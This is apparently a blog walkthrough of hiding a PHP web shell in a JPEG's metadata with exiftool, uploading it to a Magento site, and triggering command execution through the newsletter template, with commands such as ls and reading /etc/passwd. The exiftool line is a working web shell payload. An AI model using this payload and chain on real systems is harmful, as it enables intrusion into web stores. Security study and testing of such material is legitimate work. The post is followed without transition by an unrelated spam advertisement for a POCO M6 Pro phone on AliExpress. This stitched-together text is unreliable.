This one took me a while to figure out, probably longer than it should have. So it gets its own post. There’s some stuff scattered on the internet for it, so I wanted to piece it all in one spot.
Exiftool
Exiftool is an open source program that can be used for manipulating image, audio, and video files. It has a lot of options, but the one we’re the most interested in is updating the DocumentName field.
Exiftool is not installed by default on Kali Linux, so run a apt-get install exiftool if needed.
These are the default fields and their corresponding values for a picture of a frog I grabbed off the internet. But we can tweak it, and add a php shell, with the following syntax:
exiftool -DocumentName="<h1>Testing<br><?php if(isset(\$_REQUEST['cmd'])){echo '<pre>';\$cmd = (\$_REQUEST['cmd']);system(\$cmd);echo '</pre>';} __halt_compiler();?></h1>" frog.jpg
We add the Testing into our code so that when we look at our preview later we can verify the page is at least loading correctly. We can then use exiftool to verify our image has been updated:
And if we go and look at the image it appears untouched.
I won’t go into extreme detail on where to upload the image, because it’s documented well here: https://www.foregenix.com/blog/anatomy-of-a-magento-attack-froghopper
But once you’ve uploaded it, you can verify that it did upload properly by navigating to the directory in the URL.
And if we click on it, we see our frog.
Now, some websites may run the .php code from within the image here. Most won’t. This known vulnerability walks us through (via the link mentioned above) on how to get the .jpg to interpret the PhP code via the Newsletter template. The crucial thing is once you’ve updated your template, make sure you Save it.
Once you’ve saved it, preview it. If things are working you should see something similar to this screen shot.
If you don’t have this above, double check the Allow Symlinks mentioned in the link above.
Once you have this, copy the URL and paste it into a new tab. Then update the every end of the URL to ?cmd=ls and if everything works like we hope, then we should see something like this.
From here, you can tweak your commands at the end of the URL to do things like cat the /etc/passwd directory.
Immerse yourself in the world of cutting-edge technology with the global version of the POCO M6 Pro, which combines advanced features, stylish design, and an affordable price. This smartphone is designed for those who value speed, quality, and reliability.
Why is the POCO M6 Pro your ideal choice?
– Powerful Processor: The octa-core Helio G99-Ultra delivers lightning-fast performance. Gaming, streaming, multitasking—everything runs smoothly and without lag.
– Stunning Display: The 6.67-inch AMOLED screen with FHD+ resolution (2400×1080) and a 120Hz refresh rate offers incredibly sharp and vibrant visuals. With a touch sampling rate of 2160 Hz, every touch is ultra-responsive.
– More Memory, More Possibilities: Choose between the 8/256 GB or 12/512 GB configurations to store all your files, photos, videos, and apps without compromise.
– Professional Camera: The 64 MP main camera with optical image stabilization (OIS), along with additional 8 MP and 2 MP modules, allows you to capture stunning photos in any conditions. The 16 MP front camera is perfect for selfies and video calls.
– Long Battery Life, Fast Charging: The 5000 mAh battery ensures all-day usage, while the powerful 67W turbo charging brings your device back to life in just a few minutes.
– Global Version: Support for multiple languages, Google Play, and all necessary network standards (4G/3G/2G) makes this smartphone universal for use anywhere in the world.
– Convenience and Security: The built-in fingerprint sensor and AI-powered face unlock provide quick and reliable access to your device.
– Additional Features: NFC, IR blaster, dual speakers, and IP54 splash resistance—everything you need for a comfortable experience.
The POCO M6 Pro is not just a smartphone; it’s your reliable companion in the world of technology.
Hurry and grab it at a special price of just 15,000 rubles! Treat yourself to a device that impresses with its power, style, and functionality.
Take a step into the future today—purchase it on AliExpress!